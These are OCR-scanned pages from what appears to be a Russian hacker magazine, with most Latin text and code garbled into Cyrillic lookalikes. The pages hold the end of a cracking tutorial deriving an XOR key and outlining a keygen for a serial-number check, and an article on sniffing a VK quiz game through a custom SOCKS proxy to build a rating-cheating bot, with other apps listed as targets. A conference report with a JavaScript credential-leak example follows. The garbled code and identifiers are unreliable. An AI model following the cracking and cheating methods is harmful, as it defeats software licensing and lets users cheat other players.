зЕюгЕ 


Іос 
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. ЕехЕ :0040124В 
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[еах+5] , 12Ь. 


. ЕехЕ : 0040124Е 


;]П2 


зЕюгЕ 
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. ЕехЕ : 00401251 


стр 


ЬуЕе 


рЕг 


[еах+ОАЬ] , 1 


. ЕехЕ : 00401255 


З'п 2 


зЕюгЕ 


Іос 


_401272 



; Если мы здесь , значит , нас признали легальными 
; пользователями 

. ЕехЕ : 00401257 саіі зиЬ_401372 

Подытожив все вышесказанное, можно описать работу програм- 
мы так: 

1. На основе информации о машине формируется некоторое кодо- 
вое число «МасЫпесобе»; 

2 . У пользователя запрашивается имя и серийный номер; 

3. По значениям«МасЫпесобе», имени и серийного номера с 
помощью баѵаЗсгірІ-кода формируется три числа; 

4 . На основе полученных трех чисел формируется ключ к рас- 
шифровке буфера; 

5 . Расшифровывается вшитый буфер; 

6 . Правильность расшифровки проверяется по трем символам, 
взятым из расшифрованного буфера; 

7 . Если все расшифровано верно, то пользователь признается 
легальным правообладателем. Если же буфер расшифрован 
неправильно, то пользователю сообщается об ошибке. 

Теперь, когда мы разобрались с устройством защиты, давай 
перейдем к ее взлому. 

Взлом 

Вот тут-то начинается самый настоящий простор для фантазии: 
дело в том, что взломать программу можно не одним и даже не 
двумя способами. Самое простое, что приходит на ум, это испра- 
вить условные переходы в проверке правильности расшифровки 
так, чтобы они никогда не срабатывали. Или вообще забить эту 



проверку пор'ами. Но при таком подходе мы не увидим поздрави- 
тельного сообщения (да-да, в расшифровываемом буфере нахо- 
дится именно оно). 

Давай думать, что нам известно об используемом шифре. 
Во-первых, алгоритм шифрования — хог, а значит, имея пару 
«зашифрованная строка и расшифрованная строка», а затем 
выполнив операцию хог между ними, мы найдем ключ расшиф- 
ровки. Во-вторых, ключ расшифровки находился в регистре сх, 
а значит, длина ключа — два байта. Помимо всего прочего, у нас 
есть три пары значений «зашифрованный символ и расшиф- 
рованный символ» (эталон, по которому программа определяет 
правильность расшифровки). Все это позволяет нам без труда 
определить требуемый ключ расшифровки: 04Е6И. 

Зная требуемый ключ, мы можем перед циклом расшифровки 
воткнуть либо команду «тоѵ сх, 0 4 Е 6 Ь » , либо написанный полно- 
ценный кеудеп. 

А что, в написании кеудепа для этой программы нет ничего 
сверхсложного. Работать кеудеп будет приблизительно по сле- 
дующей схеме: 

1. Точно так же, как это делает ломаемая нами программа, опре- 
деляем параметры компьютера пользователя и рассчитываем на 
их основе кодовое число; 

2 . Предлагаем пользователю ввести имя, на которое он хочет сге- 
нерировать серийный номер; 

3. На основе введенного имени вычисляем соответствующее ему 
число (снова так же, как это делает программа); 

4 . Зная числа, основанные на имени пользователя, параметрах 
компа и ключе расшифровки, определяем третье число — осно- 
ванное на серийном номере; 

5 . Зная число, к которому должен приводить серийный номер, 
находим сумму символов серийного номера; 

6 . Зная сумму символов серийного номера, генерируем сам 
номер и отдаем его пользователю. 

Вот и весь кеудеп. 

Заключение 

Мы рассмотрели пример неплохой защиты, основанной на серий- 
ном номере. Как видишь, даже здесь, во вроде бы давно избитой 
методике защиты приложений, есть место воображению. Так 
что, если ты программист и хакер, то проявляй фантазию даже 
в тривиальных, казалось бы, вещах, и всем станет жить намного 
интереснее, □с 
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Исследование приложений соцсети 




• Так уж люди устроены, что им свойственна погоня за общественным 
статусом. Одни ищут сексуального супруга, другие окружают себя 
элементами роскоши, третьи же ограничиваются поддержанием 
виртуального статуса. В этой статье будет затронута часть этой 
своеобразной индустрии - многопользовательские браузерные онлайн- 
игры и их слабые места. 



Про онлайн-игры 

Для начала предлагаю разобраться, на какие же категории можно 
разделить все онлайн-игры с точки зрения их уровня безопасно- 
сти. Первый тип — это платформозависимые игры с собственным 
движком, который обычно разрабатывается с нуля. Это такие игры, 
как ѴѴогІсІ оі 1 ѴѴагсгаіф Ыпеаде, ѴѴагбаттег и другие. Как правило, 
вся информация от клиента к серверу передается по собственному 
протоколу игры, и степень ее защищенности определяется только 
фантазией разработчиков. Второй тип — это кроссплатформенные 
игры с собственным движком и протоколом обмена данными. Это 
всевозможные бойцовские клубы, игры типа Тіте^его и прочие. В 
отличие от игр первого типа, они обычно выполнены на базе РІазЬ 
и ^ѵа. Их плюс — в кроссплатформенности, а небольшой минус — в 
безопасности. Конечно, с безопасностью все не критично, но явно 
хуже, чем у первого типа игр, в силу ограниченности возможностей 
используемых технологий, особенно Ріазб. Тем не менее, у игр тре- 
тьего типа маневров для поддержания достаточно хорошего уровня 
безопасности еще меньше. Третий тип — это подмножество второго 
типа, то есть браузерные онлайн-игры, построенные на схожем про- 
токоле обмена данными, АРІ либо движке. К этому типу относятся 
игры внутри таких небезызвестных сервисов, как Маіі.ги, Ѵабоо и 



ВКонтакте. Последнему и посвятим наше внимание. Приложения 
ВКонтакте завоевали популярность в массах практически сразу же 
после своего появления. Фермы, покеры и рисовалки на стенах в 
кратчайшие сроки набрали сотни тысяч пользователей в свои ряды, а 
их создатели получили неплохую финансовую подпитку за счет люби- 
телей поднять свой рейтинг (и, как следствие, виртуальный обще- 
ственный статус] путем оплаты тех или иных услуг со счета ВКонтакте. 
Как будет показано далее, с помощью несложных манипуляций в 
некоторых приложениях можно добиться желаемого результата, не 
тратя много времени, а всего лишь написав автоматизатор (бот), 
который будет выполнять всю работу за тебя. Так я и сделал в один 
прекрасный день. 

Идея! 

С чего же все началось? А с того, что я, будучи любителем англий- 
ского языка, нашел ВКонтакте приложение І_іпдиаМапіа (\ 
ги/арр75061 1 ]. Это тренажер для изучения языков. Чтобы обучение 
проходило веселее, разработчики реализовали систему поощрений 
в виде букв, из которых можно собирать слова, а затем «покупать» за 
них одежду и одевать свою виртуальную аватарку. Ну и, само собой, 
рейтинг. А вот о нем подробнее. Рейтинг дается не только за обуче- 
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Так выглядит игровой процесс 

ние по виртуальным «учебникам», но и за игру в викторину, которая 
сразу меня заинтересовала. 

Первые несколько недель я честно набивал очки тысячами, пока не 
надоело. Набрав 100 000 очков и оторвавшись от преследователей 
в 2-3 раза, я изрядно устал и забил на это дело. Но по прошествии 
нескольких месяцев меня стали догонять в рейтинге. Тут-то и про- 
снулся мой эгоцентризм: желание сохранить первую строчку рей- 
тинга вынудило меня обдумать пути набора очков без лишней траты 
времени. 

Первым делом я полез смотреть трафик приложения: что куда пере- 
дается, что приходит обратно. Для анализа НТТР-трафика я еще 
не встречал инструмента лучше, чем приложение НТТРѴѴаІсЬ для 
Іпіегпеі Ехріогег'а [ бирѵѵаісб.сопп ]. Итак, я запустил игру, нажал кноп- 
ку «Ресогб» в аддоне для записи логов... и вот тут мне, как говорится, 
и «пришли 2 туза на префлопе». Я увидел, что приложение передает 
все свои данные как есть, в открытую. 

Изучив трафик, я обнаружил, что переменная зіаіе принимает сле- 
дующие значения: РНА8Е1, РНАЗЕ2, РНАЗЕЗ, 61ІЕ85, І_08Е. Это 
соответствует стадиям игры в каждом раунде: все буквы скрыты, 
одна буква открыта, две буквы открыты, слово угадано, слово не 
угадано. Как видишь, в открытую передается циезІіопДсІ, что, как 
несложно догадаться, есть номер вопроса. В случае первых трех 
фаз в поле «циезбоП-Ппазк» передается маска слова. Например, 
если зІа1:е=РНАЗЕЗ, первая буква С, вторая буква А, то маска слова 
— ??С?А. Если текущая фаза — (ЗІІЕ88 или Ш8Е, то слово будет ото- 
бражено на экране целиком, чтобы показать пользователю ответ. 
Соответственно, в переменной циез1;іоп_та5к это также отобразится: 
там будет слово полностью, без знаков вопроса. Смотри внимательно. 
В конце каждого раунда мы получаем номер вопроса и ответ на него. 
Именно это открытие и навело меня на идею автоматизировать про- 
цесс. Ведь каждый раз, когда мы получаем слово, мы заносим его в 
нашу базу данных слов. Если же такой циезІіопДсІ там уже есть, то 
мы берем слово и вписываем его в окошко программы, за что полу- 
чаем очки. Само собой, что проверку на наличие слова в базе нужно 
делать в тот момент, когда зіаіе будет РНА8Е1, РНА8Е2 или РНА8ЕЗ. 
Таким образом, наш бот будет самообучающимся: нет слова — запо- 
минаем, есть слово — отвечаем на вопрос. 



Кодинг 



Как же это все реализовать на практике? Для начала нужно научить- 
ся самим перехватывать трафик. Рассмотрим доступные нам вариан- 
ты. Их будет три. 
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Первый вариант — это перехват пакетов сетевого интерфейса. 
Достаточно низкоуровневый способ, требующий навыков взаимо- 
действия с внешними библиотеками, сетевыми интерфейсами и, в 
целом, умения работать с операционной системой на низком уровне. 
Тебе пригодится библиотека ѴѴіпРСар, которая позволяет получать 
пакеты в чистом виде прямо с сетевого интерфейса. В остальном — 
Гугл в помощь. 

Второй путь — это работа с Іпіегпеі Ехріогег. Этот способ, пожалуй, 
самый высокоуровневый, так как мы получаем уже готовый, обрабо- 
танный трафик. Для перехвата трафика таким образом необходимо 
владеть СОМ-программированием: уметь подключаться к СОМ- 
объектам (каковым является компонент 1\Л/еЬВго\л/зег2 внутри окна 
Іпіегпеі Ехріогег’а), реализовывать интерфейсы и работать с ними. 
Способ требует серьезных знаний в вышеуказанной области, поэтому 
я решил делать «как дед учил», третьим способом. А это у нас реа- 
лизация прокси-сервера. Точнее говоря, 8оскз 4/5 сервера. На этом 
способе заострим наше внимание. Заострим немного, так как статья 
все же не о создании Зоскз-сервера, поэтому нагружать ее кодом не 
буду. 

Начать написание Зоскз-сервера стоит с изучения вот этого мануа- 
ла: Іадз.огд/НсзЛТсІ 928.Ыпп[ . Для ленивых и англонемых будут мои 
пояснения на русском. Но сперва реализуем серверное приложение. 
Есть несколько способов сделать приложение-сервер, начиная со 
старого... 

ЗОСКЕТ тузоскек 
зоскас!с1г_іп 1оса1_аскІг ; 

1оса1_ас1с1г . зіп_каті1у = АЕ_ШЕТ; 

1оса1_ас1с1г . зіп_рогк = Ькопз (МУ_РОКТ) ; 

1оса1_ас1с1г . зіп_ас!с1г . з_ас!с1г = 0 ; 

тузоскек = зоскек (АЕ_ШЕТ , ЗОСК_ЗТКЕАМ, 0) ; 

Ъіпсі (тузоскек , (зоскасМг * ) &1оса1_ас1с1г , 
зігеок ( 1оса1_ас1с1г) ) ; 

Іізкеп (тузоскек , 1080); 

ЗОСКЕТ с1іепк_зоскек ; 
зоскаск1г_іп с1іепк_аск±г ; 

іпк с 1 іепк_ас 1 (іг_зІ 2 е = зігеок (с1іепк_ас!с1г) ; 

ѵЛііІе ( (с1іепк_зоскек = ассерк (тузоскек , 

(зоскасісіг * ) &с1іепк_асі(іг , &с 1 іепк_ас 1 с 1 г_зІ 2 е) ) ) 

{ 

ШОКБ кЫБ; 

СгеакеТкгеасі (ШЬЬ, ШЬЬ, СІіепкТЪхеасІ, 

&с1іепк_зоскек , ШЬЬ, &кЫВ) ; 

} 

...и заканчивая вполне современным способом реализации серверов 
под ѴѴіпбоѵѵз, каковым является работа с сетевыми сообщениями 
при помощи функции ѴѴЗААгупсЗеІесЩ. Саму программу и ее полный 
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Вот что получилось в итоге 



Игра «Пузыри» 



исходный код на С++ в среде Ѵізиаі Зіисііо 1 0 можно найти на ОѴБ к 
этому номеру. Рамки статьи не позволяют детально описать процесс 
создания Зоскз-сервера, поэтому я ограничусь лишь пояснением 
структуры программы и основных методов, которые я использовал. 
Начать написание такого приложения стоит примерно с такого кода: 

ЗОСКЕТ зегѵег_зоскек; 

МЗАОАТА мзаБака; 

іпк зегѵег_рогк = 312 8; 



гс = ЭДЗААзупсЗеІеск ( зоскек_гесогс!->с1іепк_зоскек , 

Шпі, СЫЕЫТ_ЕѴЕЫТ, ЕВ_ЕЕАБ | ЕБ_СЬОЗЕ) ; 

Вернемся опять в нашу оконную процедуру. В ней мы будем обраба- 
тывать вышеозначенное событие СІ_ІЕМТ_ЕѴЕМТ. Значение ІРагат в 
данном случае будет либо Е0_РЕА0 (если событие было вызвано как 
сигнал о поступлении данных в сокет), либо Е0_СІ_05Е (если сокет 
был закрыт). 



іпк диеие_зіге = 5; 



зкшск зоскас!с1г_іп зегѵег_ас!с1гезз ; 
#СІекіпе ЗЕКѴЕК_АССЕРТ Ш_ЦЗЕЕ + 1 
#Це1іпе СЬІЕЕТ_ЕѴЕЕТ Ш_ІІ8ЕК + 2 
#Йе1іпе ТАКСЕ Т_Е ѴЕІ4Т Ш_Т15ЕК + 3 
Ыеііпе ЗОСКЕТ_ОРЕЫЕБ Ш_ЦЗЕК + 4 
Мекіпе ЗОСКЕТ_СЬОЗЕБ Ш_ЛЗЕК + 5 



І2 (ШЗАСЕТЗЕЬЕСТЕѴЕЫТ (ІРагаш) == ЕБ_КЕАБ) { 

с = гесѵ(зоскек_гесогс1->с1іепк_зоскек, &Ък [ 0 ] , 1,0); 

} 

ік (МЗАСЕТЗЕБЕСТЕѴЕЖЦ ІРагат) == ЕБ_СБОЗЕ) { 



іпк ЗегѵегЗкагк (НШ Шпі) 



} 



{ 

іпк гс ; 

ШЗАСІеапир ( ) ; 

МЗАЗкагкир ( 0x0101 , &мзаБака) ; 

зегѵег_зоскек = зоскек (АЕ_ШЕТ, ЗОСК_ЗТКЕАМ, 0); 

зегѵег_асі(ігезз . зіп_1аші1у = АЕ_ІЕЕТ; 
зегѵег_ас!с1гезз . зіп_а<і(іг . 3_ип . 3_ас1с1г = 
іпек_асі(іг ("127.0.0.1") ; 
зегѵег_асі(ігезз . зіп_рогк = ккопз (зегѵег_рогк) ; 

Ыпй (зегѵег_зоскек , (ЕРЗОСКАББК) &зегѵег_асі(ігезз , 
зігеоі (зегѵег_а<ісігезз) ) ; 

Іізкеп (зегѵег_зоскек , диеие_зІ 2 е) ; 

/* мі */ гс = МЗААзупсЗеІеск (зегѵег_зоскек , 

ШпЦ, ЗЕКѴЕК_АССЕРТ, ЕБ_АССЕРТ) ; 
гекигп 0 ; 

} 

Чем же этот код отличается от первого? А тем, что в данном случае 
нам не нужно возиться с многопоточностью для обработки каждого 
подключения к серверу. Благодаря выделенной строчке мы будем в 
нашем окне ЬѴѴпсІ получать сообщения 5ЕРѴЕР_АССЕРТ при каждом 
новом подключении клиента. 

Теперь рассмотрим момент подключения. В процедуре обработки 
сообщений окна мы ловим сообщение 8ЕРѴЕР_АССЕРТ и работаем 
с ним. Как только клиент подключился, вызывается функция ассерШ, 
и далее регистрируется событие СІ_ІЕІ\ІТ_ЕѴЕІ\ІТ, которое будет при- 
ходить главному окну нашей программы, как только в сокет поступят 
данные либо сообщение о его закрытии: 

с1іепк_зоскек = ассерк ( зегѵег_зоскек , 

(ЬРЗОСКАБВК) &зоскек_гесогсі->с1іепк_а<іс1гезз , &1еп) ; 



Таким образом, мы уже научились принимать подключения и читать 
данные с сокета. Но вернемся к реализации Зоскз-протокола, упо- 
минавшейся выше. Здесь я покажу, как работает Зоскзб, хотя в моей 
программе реализована и 4-ая версия. Вот что говорит нам ВЕС. 
После подключения клиент посылает Зоскз-серверу два байта: номер 
версии (4 или 5) и количество методов аутентификации — N. После 
этого нам придет еще N байт с номерами этих самых методов. Обычно 
приходят 3 целых числа: 056, 016 и 006. То есть пятая версия и пер- 
вый метод, значение которого 006, означающий, что клиент желает 
работать без аутентификации. В ответ мы должны вернуть два байта. 
Первый — это номер версии, то есть 056, второй — значение выбран- 
ного нами (сервером) метода аутентификации из того списка, что нам 
предложил клиент. Так как клиент обычно предлагает только 006 то 
именно это мы обратно и вернем. Скушав наш ответ, клиент пришлет 
запрос следующего формата: первый байт — номер версии, второй — 
команда, третий — резервный байт, четвертый — тип адреса. После 
чего будет идти группа байт непосредственно с самим адресом хоста- 
цели, а завершат пакет два байта с номером порта хоста-цели. Формат 
группы байт с адресом хоста -цел и будет зависеть от того, какой тип 
адреса (четвертый байт) задается. Мы будем работать с привычным 
ІРѵ4, что соответствует значению 016 для четвертого байта запроса. 

В этом случае группа байт будет размером 4, то есть стандартного 
формата ІР-адреса из четырех целых чисел. Номер порта хоста-цели 
вычисляется как первый байт * 256 + второй байт. 

Итак, у нас есть запрос от клиента, который нужно выполнить. 
Подключаемся к хосту-цели по данному нам адресу и порту, ждем 
данных. Ждать данных будем как из сокета нашего клиента, так и из 
только что созданного сокета для хоста-цели, с которым клиент жела- 
ет посредством нашего Зоскз-сервера пообщаться. Все, что придет 
от клиента, посылаем хосту-цели. Все, что от хоста-цели, уходит кли- 
енту. Так и работает Зоскз-сервер. 

В моей программе реализована структура, содержащая данные обо 
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Перехваченные данные 

всех подключениях, созданных нами, чтобы при принятии сообщения 
Рй_РЕА0 мы знали, какой сокет что и куда посылает, клиент ли это 
или хост-цель, и в каком статусе находится процесс общения с ним. 
Рамки статьи не позволяют детально описать эту структуру, так что 
смотри исходный код. 

Итак, мы научились перенаправлять трафик и, следовательно, слу- 
шать его. Теперь, думаю, тебе не составит труда написать парсинг 
необходимых данных. Обрабатывая данные мы, как я уже обозначил 
ранее, смотрим, есть ли в нашей базе данных записи для искомого 
ісі. Если нет, то в момент наступления фазы І_05Е или 61ІЕ55 мы 
заносим это слово в базу данных. Если же запись имеется, то настало 
время сообщить игре правильный ответ. Это можно сделать двумя 
способами. Первый «очень высокоуровневый» и одновременно 
сложный. Заключается он в том, что мы подключаемся к СОМ-объекту 
ІѴѴеЬВгоѵѵ5ег2 внутри Іпіегпеі Ехріогег’а, в котором у нас загружена 
игра. Получаем интерфейс ЕІазЬ-ролика и уже непосредственно с ним 
работаем через ЕІазЬ АРІ, что позволит нам вбить слово прямо в тек- 
стовое поле и нажать кнопку ввода. Это очень круто. И очень сложно. 

А что если ты не пользуешься Іпіегпеі Ехріогег’ом? Да и реализо- 
вывать все вышеописанное не хватает сил и желания? Есть старый 
добрый метод эмуляции событий мышки и клавиатуры. Заключается 
он в использовании системной функции БепсИприЕ Это модернизиро- 
ванная версия кеусІЬ_еѵепШ/тои5е_еѵепШ, которая рекомендована 
производителем (М іеговой ). Вот пример нажатия клавиши Е5: 

ШРБТ ріприк ; 

ріприк . Суре = ШРБТ_КЕУВОАКБ; 

ріприк . кі . мѴк = ѴК_Е5 ; 

ріприк . кі . кіте = 0; 

ріприк . кі .ѵйЗсап = 0; 

ріприк . кі . (ЗѵтРІадз = КЕУЕѴЕБТР_ЕХТЕББЕБКЕУ ; 

ЗепсІІприк (1, &рІприк , зігеоЁ (ріприк) ) ; 

Ура! Теперь мы умеем слушать трафик через наш Зоскз-сервер, само- 
обучаться, расширяя словарь при каждом новом слове, и отвечать на 
вопросы, которые нам уже встречались. Цель достигнута! 

Стоит добавить, что в программе, выложенной по ссылке выше, отсут- 
ствует функция ввода данных. Только прослушивание трафика и ото- 
бражение слов на экране. Мне не хотелось бы, чтобы каждый второй 
начал терроризировать описанные приложения и накручивать рей- 
тинг. Более того, перед выходом этого номера журнала в свет авторы 
приложений были проинформированы о наличии уязвимости, что, 
вероятно, приведет к ее устранению. Если же ты захочешь повторить 
что-то похожее на картину ниже, то, будь добр, напиши недостающую 
функцию ответа на вопросы сам. 

И это все? 

И это будет вполне адекватный вопрос. Наличие уязвимости такого 
класса не ограничивается лишь одним приложением. К слову ска- 
зать, весь цикл приложений этого разработчика подвержен такого 
рода накрутке. А именно: 
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Такой вот расклад 



• Лингвамания — 'копіак{е.ги/арр75061 1 : 

• Викторина — ѵкопіакіе.ги/аррі 697883 : 

• Угадай мелодию — ѵкопіакіе.ги/аррі 846666 ; 

• Фотовикторина — коп1:ак1:е.ги/арр1 831 187 : 

А также некоторые другие. 

Поверхностный поиск среди приложений ВКонтакте дал еще 
несколько плодов. Первый из них — это приложение «Пузыри» по 
адресу ѵкопіакіе.ги/арр707522 . 

Если ты хороший алгоритмист и можешь написать достойную про- 
грамму для набора максимального количества очков на заданном 
поле, то для тебя есть отличная новость. Расклад «поляны» перед 
вашими глазами. 

Любителям судоку ВКонтакте есть свое местечко. Вот оно: ѵкопіакіе. 
ги/арр716582 . 

Все, что здесь требуется — это хороший и быстрый алгоритм 
решения поставленной задачи, благо ее условие не нужно полу- 
чать распознаванием картинки на экране, достаточно взглянуть 
на трафик. 

Как ты, надеюсь, понимаешь, многообразие приложений ВКонтакте 
несопоставимо с отведенной под статью квотой, поэтому оставляю 
поиск потенциальных жертв тебе, дорогой читатель, в качестве 
домашнего задания. 

Подводя итоги 

В завершение поразмыслим о том, кто виноват и что делать. 
Виновными признаются лень и жажда наживы разработчиков прило- 
жений, а также эгоизм тех, кто пользуется этими приложениями, сидя 
ночами напролет и отращивая «виртуальный половой орган». В ином 
случае эти приложения просто не разрабатывались бы для широкой 
публики. Из путей решения проблемы, какие вижу лично я, предложу 
следующие. 

Разработчикам. Внимательнее изучать вопрос безопасности исполь- 
зования приложений. Внедрение простого «шифрования» сдвигом 
на пару байт уже должно отбить у значительной доли «взломщиков» 
желание копаться в трафике, не говоря уже о более совершенных 
методах защиты данных, которые, в зависимости от твоей фантазии, в 
той или иной степени обезопасят приложение от неадекватных дей- 
ствий пользователей. 

Взломщикам. Надеяться на то, что на крючок попадется серьез- 
ная рыбка с брешами в безопасности, такими, как были описаны 
выше, не стоит. Разработчики крупных приложений (в особенности 
тех, где чувствуется присутствие денежной составляющей) обыч- 
но умеют считать потери от деятельности любителей «покопаться 
внутри». Так что возьми все вышесказанное на заметку без лишних 
иллюзий касаемо сверхвыгодного применения этих знаний на 
практике. 

Тем, кто все еще играет. Перестань. Это всего лишь точки на экра- 
не. Во многих играх есть вполне реальная возможность автомати- 
зации процесса игры и все твои многочасовые, а в редких клини- 
ческих случаях и многодневные, усилия будут смотреться скудно 
по сравнению с результатами работы компьютерной программы. 
Программа не хочет ни спать, ни есть. Она не устает и не сдается. 
Не нужно соревноваться с программой. Живи реальной жизнью, 
а не жизнью «эльфа 80-го уровня». Испытав все это в свое время 
на личном опыте, я бросил этим заниматься. И вот, осознав, что 
знанием стоит поделиться с другими, я открыл текстовый редактор 
и написал первые строки этой статьи, т 
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і Зтой осенью мне посчастливилось побывать на зесигііу-конференции 
Наск Іп Не Вох, проходившей с 11 по 14 октября в Куала-Лумпуре. 
Поездка оказалась втройне приятной: во-первых, я очень люблю Азию; 
во-вторых, я приехал на конфу в роли спикера; и в-третьих, меня очень 
порадовал общий уровень презентаций - было интересно послушать 

выступления братьев по разуму. 



Куала-Лумпур — родина НІТВ: именно здесь в 2003 году замеча- 
тельный человек Дилон Эндрю Каннабиран впервые организовал 
и провел эту конференцию. За 7 лет НІТВ стал одним из автори- 
тетных зесигііу-ивентов, на который со всего мира съезжаются 
лучшие специалисты в области ИБ. Именно поэтому сейчас самое 
время перейти к главному — к докладам, которых было немало. 

Раскроем коробку 

Исследователи Лонг Ли и Тан Нгуен посвятили свой доклад мод- 
ной теме ВОР, основы которой уже описывал Алексей Синцов в 
предыдущих номерах. В докладе на НІТВ специалисты сосредото- 
чили внимание на данной технике применительно к І_іпих и таким 
защитам, как І\ІХ, А5І_Р и АЗСІІ-Агппог. Ребята представили тулзу 
РОРМЕ, которая являет собой не что иное, как обычный набор 
РОР-гаджетов и скриптов для автоматизации написания РОР- 
эксплойтов (что очень даже полезно, вручную их писать - занятие 
довольно кропотливое]. В общем, если тема написания эксплойтов 
— это твое, то не поленись и изучи этот материал. 

Следующий доклад представил ТЬе Ѳгидд — хороший приятель 
небезызвестного Федора Ярочкина, с которым мы неплохо пооб- 
щались в Амстердаме на прошлом НІТВ. Выступление было посвя- 
щено атакам на 65М-станции. Одна из представленных в докладе 
утилит — это РАС Неіі, с помощью которой можно отправлять в 
глубокий БоЗ базовые станции Ѳ5М. Следующая утилита — ІМБІ 



РІоосІ — нарушает работоспособность ѴІ_Р и Н ЕР, а также отрубает 
сеть. Кроме того, были показаны наработки в области фаззинга на 
ВазеЬапсІ-станции с помощью Фреймворка ОрепВТЗ и специализи- 
рованного софта Созеіпс ѲЗМ РиггРагт. 

Исследователь Жан-Баптист Бедрун из компании Зодеб рассказал, 
как взламывать ОРМ-системы на примерах ОиіскТіппе и іТипез. 
Поскольку я, сам являясь автором, не считаю нарушение авторских 
прав достойным занятием, то с подробностями доклада я не знако- 
мился, но тебе это сделать никто, кроме совести, не запрещает. 
Цедрик Гельбрун и Жан Сигвальд из той же компании поведали 
о безопасности Айфона. Доклад был посвящен описанию общей 
системы безопасности, а также атакам на загрузчик (в основном 
применяется для выполнения б а і I В ге а к ) и браузер. В целом вла- 
дельцам игрушки, наверное, будет интересно. Мне же, несчастному 
дикарю, ни разу не державшему в руках диковинного зверя (ну 
ладно, один раз дали потрогать :)), доклад был не особо интересен. 
Продолжая модную тему безопасности мобильных устройств, пред- 
ставил свой доклад «Зтагірбопез, Арріісабопз & Зесигііу» иссле- 
дователь Себастьян Зейглер, который говорил в основном о защите 
конфиденциальной информации, хранящейся на мобильных 
устройствах (начиная от приватных фото и заканчивая банковскими 
счетами), а также собственно о том, как эту информацию украсть и 
использовать для различных сценариев социальной инженерии. 
Отдельное внимание Себастьян уделил появившимся недавно фей- 
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ковым банковским приложениям и различным фишкам 
— например, взлом блокировки андроида с помощью 
тупого анализа отпечатков жирных пальцев на дисплее 
(телефон разблокируется путем рисования пальцем 
фигуры, известной только владельцу). 

На конференции также выступил исследователь 
Шрираж Шах, который занимается безопасностью 
\д/еЬ2.0. В этот раз темой его доклада являлась безопас- 
ность Вгоѵѵзег йОМ. Справедливости ради замечу, что в 
выступлении было множество пересечений с предыду- 
щим докладом. Из интересного можно отметить такой 
вектор атаки, когда злоумышленник внедряет код в 
новостную ленту, после чего, в результате некорректной 
обработки сервером данного сообщения (а точнее — 
в случае отсутствии фильтрации), есть возможность 
выполнить произвольный код в браузере жертвы. А 
можно сделать еще интереснее — проэксплуатировать 
уязвимость 00М Эіеаііпд. Уязвимость заключается в 
том, что иногда разработчики сохраняют критичную 
информацию в глобальных переменных. Это можно 
продемонстрировать на следующем примере, где в 
переменную Іетр сохраняется игі-строка с именем 
пользователя и его паролем: 



Сетр = " Іодіп . с!о?изег= " +изег+ " &рж!= " +рж1; 
хтШЦЦр . ореп ( " СЕТ " , Сетр , Цгие ) ; хтШЦЦр . 
ореп ( " СЕТ " , Ц ешр , Ц гие ) ; 
хтІЬЦЦр . опгеасіузЦаЦес}іапде=^ипсЦіоп ( ) 



Таким образом, если получить доступ к этой пере- 
менной через боситепСЬосІу, то можно перехватить 
не только куки, но и пароли в открытом виде, а также 
любую другую критичную информацию. Еще одна 
фишка заключается в том, что через Э0М Х55 можно 
получить доступ к переменным Еіазб- и ЭіІѵегІідЫ:- 
объектов, а это еще одно место с критической инфор- 
мацией... Ну а остальное ты прочитаешь сам. 

Ни одна конференция не обходится без какого-либо 
доклада по фаззингу. Вот и на НІТВ такой, разумеется, 
был представлен. Исследователь Мэри Йео из компа- 
нии Іпіеі рассказала про фаззинг РТІ_ (Редізіег Тгапзіюг 
1_еѵеІ). Возможно, кого-то данная тема также заинтере- 
сует, но в Хакере фаззинг расписывался не раз, так что 
останавливаться на этой теме я не буду (благо ничего 
нового из доклада не узнал). 

Забавный доклад представил Лоран Удо из ТЕНТРІ- 
Эесигііу. Он рассказывал про МІТМ-атаки на ѵѵеЬ. На 
этот раз он взял довольно «боянистую» тему анализа 
атак. Описывал стандартные сценарии заражения 



ѵѵеЬ-ресурсов, размещения вредоносного кода (сплоит- 
пака), затроянивание юзеров и фарминг их аккаунтов. 

В качестве примеров Лоран разобрал несколько реаль- 
ных атак. Один из примеров - фарминг фейсбуковских 
аккаунтов с помощью фишинговой страницы, которая 
после захода редиректила на нормальный фейсбук. 
Такие фишинговые сайты легко отлавливаются по 
рефереру, который оставляет клиент. После того, как 
фейковый сайт становится известным, есть множество 
вариантов отловить злоумышленников. Кроме того, 
можно предупреждать пользователей путем подмены 
картинок на предупреждающие. Смысл в том, что фей- 
ковые сайты зачастую имеют ссылки на изображения 
с реальных, дабы максимально приблизить сходство. 
Таким образом, владельцы сайта видят, что идет обра- 
щение с левым реферером, и выдают вместо обычного 
изображения текст с предупреждением. Вот такая 
интересная идея, а остальное ты можешь прочитать в 
первоисточнике. 

Далее мы рассмотрим наиболее интересные доклады 
подробнее. 

Ох уж эта виртуализация 

Безопасность систем виртуализации — модная сейчас 
тема, и некоторые специалисты даже выделяют ее 
в отдельную область знаний, чуть ли не в отдельную 
аудиторскую услугу. Я скептически отношусь к этому: 
все-таки на данный момент пентест виртуальных 
машин не сильно отличается от обычного. Тем не 
менее, в ближайшие годы данная тема будет разви- 
ваться и, возможно, через какое-то время можно будет 
всерьез выделять аудит виртуальной инфраструктуры в 
отдельную услугу. 

Понятно, что уязвимости, позволяющие выйти из 
дочерней системы в родительскую, будут появляться, но 
эта проблема частично решается патч-менеджментом. 

А вот как быть с ошибками, связанными с неправиль- 
ной конфигурацией и архитектурой виртуальной инфра- 
структуры? 

Клаудио Крисционе из Италии попробовал ответить на 
этот вопрос, представив доклад по теме. Вот ключевые 
точки его выступления: 

• Фреймворк ѴА5Т0 для метасплоита, «Тбе Ѵігіиаіігабоп 
Аззеззппепі Тоікіі». Он позволяет автоматизировать 
ряд проверок во время аудита виртуальной инфра- 
структуры. В частности, для поиска виртуальных машин 
есть модуль Ѵппѵѵаге Ѵегзіоп, который с помощью зоар- 
запроса на 80 порт позволяет получить инфу о версии 
системы путем фингерпринтинга. 
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Самуил Шах. Запомни это лицо: если тебе посчаст- 
ливится побывать на его докладе, то считай, что тебе 
крупно повезло 



• Аудит клиентских машин, то есть тех, с которых осуществляется 
управление виртуальной инфраструктурой — занятие повеселей. 

На всех из них присутствует клиентское ПО (ѴМѵѵаге VI сІіепі) и, 
конечно же, в нем есть уязвимости — к примеру, в тех же АсІіѵеХ- 
компонентах. Также у клиентского ПО есть функция автоматиче- 
ских обновлений. Запрос на обновление выглядит следующим 
образом: 

<Соп^ідКооЦ> 

<с1іепбСоппесбіоп іс1="0000"> 

<аибМРогб>9 02</аибЬсІРогб> 

<ѵегзіоп>3</ѵегзіоп> 

<рабсЦѴегзіоп>3 . О . 0</раЦсЬѴегзіоп> 

<аріѴегзіоп>3 . 1 . 0</аріѴегзіоп> 

